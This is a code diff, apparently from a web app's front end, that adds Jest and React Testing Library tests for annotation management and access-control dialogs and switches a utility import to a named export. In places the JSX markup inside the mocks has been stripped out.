mockedFetchAnnotations.mockResolvedValue({ data: [] }) + }) + + it('should fetch annotations on mount and render enabled export actions when data exist', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + renderComponent() + + await waitFor(() => { + expect(mockedFetchAnnotations).toHaveBeenCalledWith('test-app-id') + }) + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).not.toBeDisabled() + expect(jsonButton).not.toBeDisabled() + + await waitFor(() => { + expect(lastCSVDownloaderProps).toMatchObject({ + bom: true, + filename: 'annotations-en-US', + type: 'link', + data: [ + ['Question', 'Answer'], + ['Question 1', 'Answer 1'], + ], + }) + }) + }) + + it('should disable export actions when there are no annotations', async () => { + const user = userEvent.setup() + renderComponent() + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).toBeDisabled() + expect(jsonButton).toBeDisabled() + + expect(lastCSVDownloaderProps).toMatchObject({ + data: [['Question', 'Answer']], + }) + }) + + it('should open the add annotation modal and forward the onAdd callback', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const onAdd = jest.fn().mockResolvedValue(undefined) + renderComponent({ onAdd }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalled()) + + await user.click( + screen.getByRole('button', { name: 'appAnnotation.table.header.addAnnotation' }), + ) + + await screen.findByText('appAnnotation.addModal.title') + const questionInput = screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder') + const answerInput = screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder') + + await user.type(questionInput, 'Integration question') + await user.type(answerInput, 
'Integration answer') + await user.click(screen.getByRole('button', { name: 'common.operation.add' })) + + await waitFor(() => { + expect(onAdd).toHaveBeenCalledWith({ + question: 'Integration question', + answer: 'Integration answer', + }) + }) + }) + + it('should allow bulk import through the batch modal', async () => { + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.bulkImport') + + expect(await screen.findByText('appAnnotation.batchModal.title')).toBeInTheDocument() + await user.click( + screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' }), + ) + expect(onAdded).not.toHaveBeenCalled() + }) + + it('should trigger JSONL download with locale-specific filename', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const originalCreateElement = document.createElement.bind(document) + const anchor = originalCreateElement('a') as HTMLAnchorElement + const clickSpy = jest.spyOn(anchor, 'click').mockImplementation(jest.fn()) + const createElementSpy = jest + .spyOn(document, 'createElement') + .mockImplementation((tagName: Parameters[0]) => { + if (tagName === 'a') + return anchor + return originalCreateElement(tagName) + }) + const objectURLSpy = jest + .spyOn(URL, 'createObjectURL') + .mockReturnValue('blob://mock-url') + const revokeSpy = jest.spyOn(URL, 'revokeObjectURL').mockImplementation(jest.fn()) + + renderComponent({}, LanguagesSupported[1] as string) + + await expandExportMenu(user) + + await waitFor(() => expect(mockCSVDownloader).toHaveBeenCalled()) + + const { jsonButton } = await getExportButtons() + await user.click(jsonButton) + + expect(createElementSpy).toHaveBeenCalled() + expect(anchor.download).toBe(`annotations-${LanguagesSupported[1]}.jsonl`) + expect(clickSpy).toHaveBeenCalled() + 
expect(revokeSpy).toHaveBeenCalledWith('blob://mock-url') + + const blobArg = objectURLSpy.mock.calls[0][0] as Blob + await expect(blobArg.text()).resolves.toContain('"Question 1"') + + clickSpy.mockRestore() + createElementSpy.mockRestore() + objectURLSpy.mockRestore() + revokeSpy.mockRestore() + }) + + it('should clear all annotations when confirmation succeeds', async () => { + mockedClearAllAnnotations.mockResolvedValue(undefined) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalledWith('test-app-id') + expect(onAdded).toHaveBeenCalled() + }) + }) + + it('should handle clear all failures gracefully', async () => { + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + mockedClearAllAnnotations.mockRejectedValue(new Error('network')) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalled() + expect(onAdded).not.toHaveBeenCalled() + expect(consoleSpy).toHaveBeenCalled() + }) + + consoleSpy.mockRestore() + }) + + it('should refetch annotations when controlUpdateList changes', async () => { + const view = renderComponent({ controlUpdateList: 0 }) + + await waitFor(() => 
expect(mockedFetchAnnotations).toHaveBeenCalledTimes(1)) + + view.rerender( + + + , + ) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(2)) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.tsx b/web/app/components/app/annotation/header-opts/index.tsx index 024f75867c..5f8ef658e7 100644 --- a/web/app/components/app/annotation/header-opts/index.tsx +++ b/web/app/components/app/annotation/header-opts/index.tsx @@ -17,7 +17,7 @@ import Button from '../../../base/button' import AddAnnotationModal from '../add-annotation-modal' import type { AnnotationItemBasic } from '../type' import BatchAddModal from '../batch-add-annotation-modal' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import CustomPopover from '@/app/components/base/popover' import { FileDownload02, FilePlus02 } from '@/app/components/base/icons/src/vender/line/files' import { ChevronRight } from '@/app/components/base/icons/src/vender/line/arrows' diff --git a/web/app/components/app/annotation/index.spec.tsx b/web/app/components/app/annotation/index.spec.tsx new file mode 100644 index 0000000000..4971f5173c --- /dev/null +++ b/web/app/components/app/annotation/index.spec.tsx @@ -0,0 +1,233 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import Annotation from './index' +import type { AnnotationItem } from './type' +import { JobStatus } from './type' +import { type App, AppModeEnum } from '@/types/app' +import { + addAnnotation, + delAnnotation, + delAnnotations, + fetchAnnotationConfig, + fetchAnnotationList, + queryAnnotationJobStatus, +} from '@/service/annotation' +import { useProviderContext } from '@/context/provider-context' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { notify: jest.fn() }, +})) + +jest.mock('ahooks', () => ({ + useDebounce: (value: any) => value, 
+})) + +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + delAnnotation: jest.fn(), + delAnnotations: jest.fn(), + fetchAnnotationConfig: jest.fn(), + editAnnotation: jest.fn(), + fetchAnnotationList: jest.fn(), + queryAnnotationJobStatus: jest.fn(), + updateAnnotationScore: jest.fn(), + updateAnnotationStatus: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./filter', () => ({ children }: { children: React.ReactNode }) => ( +
{children}
+)) + +jest.mock('./empty-element', () => () =>
) + +jest.mock('./header-opts', () => (props: any) => ( +
+ +
+)) + +let latestListProps: any + +jest.mock('./list', () => (props: any) => { + latestListProps = props + if (!props.list.length) + return
+ return ( +
+ + + +
+ ) +}) + +jest.mock('./view-annotation-modal', () => (props: any) => { + if (!props.isShow) + return null + return ( +
+
{props.item.question}
+ + +
+ ) +}) + +jest.mock('@/app/components/base/pagination', () => () =>
) +jest.mock('@/app/components/base/loading', () => () =>
) +jest.mock('@/app/components/base/features/new-feature-panel/annotation-reply/config-param-modal', () => (props: any) => props.isShow ?
: null) +jest.mock('@/app/components/billing/annotation-full/modal', () => (props: any) => props.show ?
: null) + +const mockNotify = Toast.notify as jest.Mock +const addAnnotationMock = addAnnotation as jest.Mock +const delAnnotationMock = delAnnotation as jest.Mock +const delAnnotationsMock = delAnnotations as jest.Mock +const fetchAnnotationConfigMock = fetchAnnotationConfig as jest.Mock +const fetchAnnotationListMock = fetchAnnotationList as jest.Mock +const queryAnnotationJobStatusMock = queryAnnotationJobStatus as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock + +const appDetail = { + id: 'app-id', + mode: AppModeEnum.CHAT, +} as App + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-1', + question: overrides.question ?? 'Question 1', + answer: overrides.answer ?? 'Answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const renderComponent = () => render() + +describe('Annotation', () => { + beforeEach(() => { + jest.clearAllMocks() + latestListProps = undefined + fetchAnnotationConfigMock.mockResolvedValue({ + id: 'config-id', + enabled: false, + embedding_model: { + embedding_model_name: 'model', + embedding_provider_name: 'provider', + }, + score_threshold: 0.5, + }) + fetchAnnotationListMock.mockResolvedValue({ data: [], total: 0 }) + queryAnnotationJobStatusMock.mockResolvedValue({ job_status: JobStatus.completed }) + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should render empty element when no annotations are returned', async () => { + renderComponent() + + expect(await screen.findByTestId('empty-element')).toBeInTheDocument() + expect(fetchAnnotationListMock).toHaveBeenCalledWith(appDetail.id, expect.objectContaining({ + page: 1, + keyword: '', + })) + }) + + it('should handle annotation creation and refresh list data', async () => { + const annotation = createAnnotation() + 
fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + addAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + + await screen.findByTestId('list') + fireEvent.click(screen.getByTestId('trigger-add')) + + await waitFor(() => { + expect(addAnnotationMock).toHaveBeenCalledWith(appDetail.id, { question: 'new question', answer: 'new answer' }) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + message: 'common.api.actionSuccess', + type: 'success', + })) + }) + expect(fetchAnnotationListMock).toHaveBeenCalledTimes(2) + }) + + it('should support viewing items and running batch deletion success flow', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + delAnnotationsMock.mockResolvedValue(undefined) + delAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + await waitFor(() => { + expect(delAnnotationsMock).toHaveBeenCalledWith(appDetail.id, [annotation.id]) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'success', + })) + expect(latestListProps.selectedIds).toEqual([]) + }) + + fireEvent.click(screen.getByTestId('list-view')) + expect(screen.getByTestId('view-modal')).toBeInTheDocument() + + await act(async () => { + fireEvent.click(screen.getByTestId('view-modal-remove')) + }) + await waitFor(() => { + expect(delAnnotationMock).toHaveBeenCalledWith(appDetail.id, annotation.id) + }) + }) + + it('should show an error notification when batch deletion fails', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + const error = new 
Error('failed') + delAnnotationsMock.mockRejectedValue(error) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: error.message, + }) + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + }) +}) diff --git a/web/app/components/app/annotation/index.tsx b/web/app/components/app/annotation/index.tsx index 32d0c799fc..2d639c91e4 100644 --- a/web/app/components/app/annotation/index.tsx +++ b/web/app/components/app/annotation/index.tsx @@ -25,7 +25,7 @@ import { sleep } from '@/utils' import { useProviderContext } from '@/context/provider-context' import AnnotationFullModal from '@/app/components/billing/annotation-full/modal' import { type App, AppModeEnum } from '@/types/app' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { delAnnotations } from '@/service/annotation' type Props = { diff --git a/web/app/components/app/annotation/list.spec.tsx b/web/app/components/app/annotation/list.spec.tsx new file mode 100644 index 0000000000..9f8d4c8855 --- /dev/null +++ b/web/app/components/app/annotation/list.spec.tsx @@ -0,0 +1,116 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import List from './list' +import type { AnnotationItem } from './type' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 
'question 1', + answer: overrides.answer ?? 'answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 2, +}) + +const getCheckboxes = (container: HTMLElement) => container.querySelectorAll('[data-testid^="checkbox"]') + +describe('List', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render annotation rows and call onView when clicking a row', () => { + const item = createAnnotation() + const onView = jest.fn() + + render( + , + ) + + fireEvent.click(screen.getByText(item.question)) + + expect(onView).toHaveBeenCalledWith(item) + expect(mockFormatTime).toHaveBeenCalledWith(item.created_at, 'appLog.dateTimeFormat') + }) + + it('should toggle single and bulk selection states', () => { + const list = [createAnnotation({ id: 'a', question: 'A' }), createAnnotation({ id: 'b', question: 'B' })] + const onSelectedIdsChange = jest.fn() + const { container, rerender } = render( + , + ) + + const checkboxes = getCheckboxes(container) + fireEvent.click(checkboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a']) + + rerender( + , + ) + const updatedCheckboxes = getCheckboxes(container) + fireEvent.click(updatedCheckboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith([]) + + fireEvent.click(updatedCheckboxes[0]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a', 'b']) + }) + + it('should confirm before removing an annotation and expose batch actions', async () => { + const item = createAnnotation({ id: 'to-delete', question: 'Delete me' }) + const onRemove = jest.fn() + render( + , + ) + + const row = screen.getByText(item.question).closest('tr') as HTMLTableRowElement + const actionButtons = within(row).getAllByRole('button') + fireEvent.click(actionButtons[1]) + + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + 
fireEvent.click(confirmButton) + expect(onRemove).toHaveBeenCalledWith(item.id) + + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/annotation/list.tsx b/web/app/components/app/annotation/list.tsx index 4135b4362e..62a0c50e60 100644 --- a/web/app/components/app/annotation/list.tsx +++ b/web/app/components/app/annotation/list.tsx @@ -7,7 +7,7 @@ import type { AnnotationItem } from './type' import RemoveAnnotationConfirmModal from './remove-annotation-confirm-modal' import ActionButton from '@/app/components/base/action-button' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import BatchAction from './batch-action' diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove 
annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/type.ts b/web/app/components/app/annotation/type.ts index 5df6f51ace..e2f2264f07 100644 --- a/web/app/components/app/annotation/type.ts +++ b/web/app/components/app/annotation/type.ts @@ -12,6 +12,12 @@ export type AnnotationItem = { hit_count: number } +export type AnnotationCreateResponse = AnnotationItem & { + account?: { + name?: string + } +} + export type HitHistoryItem = { id: string question: string diff --git a/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..dec0ad0c01 --- /dev/null +++ b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx @@ -0,0 +1,158 @@ +import React from 'react' +import { fireEvent, render, 
screen, waitFor } from '@testing-library/react' +import ViewAnnotationModal from './index' +import type { AnnotationItem, HitHistoryItem } from '../type' +import { fetchHitHistoryList } from '@/service/annotation' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchHitHistoryList: jest.fn(), +})) + +jest.mock('../edit-annotation-modal/edit-item', () => { + const EditItemType = { + Query: 'query', + Answer: 'answer', + } + return { + __esModule: true, + default: ({ type, content, onSave }: { type: string; content: string; onSave: (value: string) => void }) => ( +
+
{content}
+ +
+ ), + EditItemType, + } +}) + +const fetchHitHistoryListMock = fetchHitHistoryList as jest.Mock + +const createAnnotationItem = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question', + answer: overrides.answer ?? 'answer', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const createHitHistoryItem = (overrides: Partial = {}): HitHistoryItem => ({ + id: overrides.id ?? 'hit-id', + question: overrides.question ?? 'query', + match: overrides.match ?? 'match', + response: overrides.response ?? 'response', + source: overrides.source ?? 'source', + score: overrides.score ?? 0.42, + created_at: overrides.created_at ?? 1700000000, +}) + +const renderComponent = (props?: Partial>) => { + const item = createAnnotationItem() + const mergedProps: React.ComponentProps = { + appId: 'app-id', + isShow: true, + onHide: jest.fn(), + item, + onSave: jest.fn().mockResolvedValue(undefined), + onRemove: jest.fn().mockResolvedValue(undefined), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('ViewAnnotationModal', () => { + beforeEach(() => { + jest.clearAllMocks() + fetchHitHistoryListMock.mockResolvedValue({ data: [], total: 0 }) + }) + + it('should render annotation tab and allow saving updated query', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-query')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith('query-updated', props.item.answer) + }) + }) + + it('should render annotation tab and allow saving updated answer', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-answer')) + + // 
Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith(props.item.question, 'answer-updated') + }, + ) + }) + + it('should switch to hit history tab and show no data message', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByText('appAnnotation.viewModal.hitHistory')) + + // Assert + expect(await screen.findByText('appAnnotation.viewModal.noHitHistory')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(props.item.created_at, 'appLog.dateTimeFormat') + }) + + it('should render hit history entries with pagination badge when data exists', async () => { + const hits = [createHitHistoryItem({ question: 'user input' }), createHitHistoryItem({ id: 'hit-2', question: 'second' })] + fetchHitHistoryListMock.mockResolvedValue({ data: hits, total: 15 }) + + renderComponent() + + fireEvent.click(await screen.findByText('appAnnotation.viewModal.hitHistory')) + + expect(await screen.findByText('user input')).toBeInTheDocument() + expect(screen.getByText('15 appAnnotation.viewModal.hits')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(hits[0].created_at, 'appLog.dateTimeFormat') + }) + + it('should confirm before removing the annotation and hide on success', async () => { + const { props } = renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + + await waitFor(() => { + expect(props.onRemove).toHaveBeenCalledTimes(1) + expect(props.onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/view-annotation-modal/index.tsx 
b/web/app/components/app/annotation/view-annotation-modal/index.tsx index 8426ab0005..d21b177098 100644 --- a/web/app/components/app/annotation/view-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/view-annotation-modal/index.tsx @@ -14,7 +14,7 @@ import TabSlider from '@/app/components/base/tab-slider-plain' import { fetchHitHistoryList } from '@/service/annotation' import { APP_PAGE_LIMIT } from '@/config' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { appId: string diff --git a/web/app/components/app/app-access-control/access-control-dialog.tsx b/web/app/components/app/app-access-control/access-control-dialog.tsx index ee3fa9650b..99cf6d7074 100644 --- a/web/app/components/app/app-access-control/access-control-dialog.tsx +++ b/web/app/components/app/app-access-control/access-control-dialog.tsx @@ -2,7 +2,7 @@ import { Fragment, useCallback } from 'react' import type { ReactNode } from 'react' import { Dialog, Transition } from '@headlessui/react' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type DialogProps = { className?: string diff --git a/web/app/components/app/app-access-control/access-control.spec.tsx b/web/app/components/app/app-access-control/access-control.spec.tsx new file mode 100644 index 0000000000..ea0e17de2e --- /dev/null +++ b/web/app/components/app/app-access-control/access-control.spec.tsx @@ -0,0 +1,389 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AccessControl from './index' +import AccessControlDialog from './access-control-dialog' +import AccessControlItem from './access-control-item' +import AddMemberOrGroupDialog from './add-member-or-group-pop' +import SpecificGroupsOrMembers from './specific-groups-or-members' +import useAccessControlStore from 
'@/context/access-control-store' +import { useGlobalPublicStore } from '@/context/global-public-context' +import type { AccessControlAccount, AccessControlGroup, Subject } from '@/models/access-control' +import { AccessMode, SubjectType } from '@/models/access-control' +import Toast from '../../base/toast' +import { defaultSystemFeatures } from '@/types/feature' +import type { App } from '@/types/app' + +const mockUseAppWhiteListSubjects = jest.fn() +const mockUseSearchForWhiteListCandidates = jest.fn() +const mockMutateAsync = jest.fn() +const mockUseUpdateAccessMode = jest.fn(() => ({ + isPending: false, + mutateAsync: mockMutateAsync, +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (value: { userProfile: { email: string; id?: string; name?: string; avatar?: string; avatar_url?: string; is_password_set?: boolean } }) => T) => selector({ + userProfile: { + id: 'current-user', + name: 'Current User', + email: 'member@example.com', + avatar: '', + avatar_url: '', + is_password_set: true, + }, + }), +})) + +jest.mock('@/service/common', () => ({ + fetchCurrentWorkspace: jest.fn(), + fetchLangGeniusVersion: jest.fn(), + fetchUserProfile: jest.fn(), + getSystemFeatures: jest.fn(), +})) + +jest.mock('@/service/access-control', () => ({ + useAppWhiteListSubjects: (...args: unknown[]) => mockUseAppWhiteListSubjects(...args), + useSearchForWhiteListCandidates: (...args: unknown[]) => mockUseSearchForWhiteListCandidates(...args), + useUpdateAccessMode: () => mockUseUpdateAccessMode(), +})) + +jest.mock('@headlessui/react', () => { + const DialogComponent: any = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + DialogComponent.Panel = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogTitle = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogDescription = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const TransitionChild = ({ children }: any) => ( + <>{typeof children === 'function' ? children({}) : children} + ) + const Transition = ({ show = true, children }: any) => ( + show ? <>{typeof children === 'function' ? children({}) : children} : null + ) + Transition.Child = TransitionChild + return { + Dialog: DialogComponent, + Transition, + DialogTitle, + Description: DialogDescription, + } +}) + +jest.mock('ahooks', () => { + const actual = jest.requireActual('ahooks') + return { + ...actual, + useDebounce: (value: unknown) => value, + } +}) + +const createGroup = (overrides: Partial = {}): AccessControlGroup => ({ + id: 'group-1', + name: 'Group One', + groupSize: 5, + ...overrides, +} as AccessControlGroup) + +const createMember = (overrides: Partial = {}): AccessControlAccount => ({ + id: 'member-1', + name: 'Member One', + email: 'member@example.com', + avatar: '', + avatarUrl: '', + ...overrides, +} as AccessControlAccount) + +const baseGroup = createGroup() +const baseMember = createMember() +const groupSubject: Subject = { + subjectId: baseGroup.id, + subjectType: SubjectType.GROUP, + groupData: baseGroup, +} as Subject +const memberSubject: Subject = { + subjectId: baseMember.id, + subjectType: SubjectType.ACCOUNT, + accountData: baseMember, +} as Subject + +const resetAccessControlStore = () => { + useAccessControlStore.setState({ + appId: '', + specificGroups: [], + specificMembers: [], + currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS, + selectedGroupsForBreadcrumb: [], + }) +} + +const resetGlobalStore = () => { + useGlobalPublicStore.setState({ + systemFeatures: defaultSystemFeatures, + isGlobalPending: false, + }) +} + +beforeAll(() => { + class MockIntersectionObserver { + observe = jest.fn(() => undefined) + disconnect = jest.fn(() => undefined) + unobserve = jest.fn(() => undefined) + } + // @ts-expect-error jsdom does not implement IntersectionObserver + globalThis.IntersectionObserver = MockIntersectionObserver +}) + +beforeEach(() => 
{ + jest.clearAllMocks() + resetAccessControlStore() + resetGlobalStore() + mockMutateAsync.mockResolvedValue(undefined) + mockUseUpdateAccessMode.mockReturnValue({ + isPending: false, + mutateAsync: mockMutateAsync, + }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: false, + data: { + groups: [baseGroup], + members: [baseMember], + }, + }) + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [{ currPage: 1, subjects: [groupSubject, memberSubject], hasMore: false }] }, + }) +}) + +// AccessControlItem handles selected vs. unselected styling and click state updates +describe('AccessControlItem', () => { + it('should update current menu when selecting a different access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.PUBLIC }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + expect(option).toHaveClass('cursor-pointer') + + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) + + it('should keep current menu when clicking the selected access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) +}) + +// AccessControlDialog renders a headless UI dialog with a manual close control +describe('AccessControlDialog', () => { + it('should render dialog content when visible', () => { + render( + +
Dialog Content
+
, + ) + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByText('Dialog Content')).toBeInTheDocument() + }) + + it('should trigger onClose when clicking the close control', async () => { + const handleClose = jest.fn() + const { container } = render( + +
Dialog Content
+
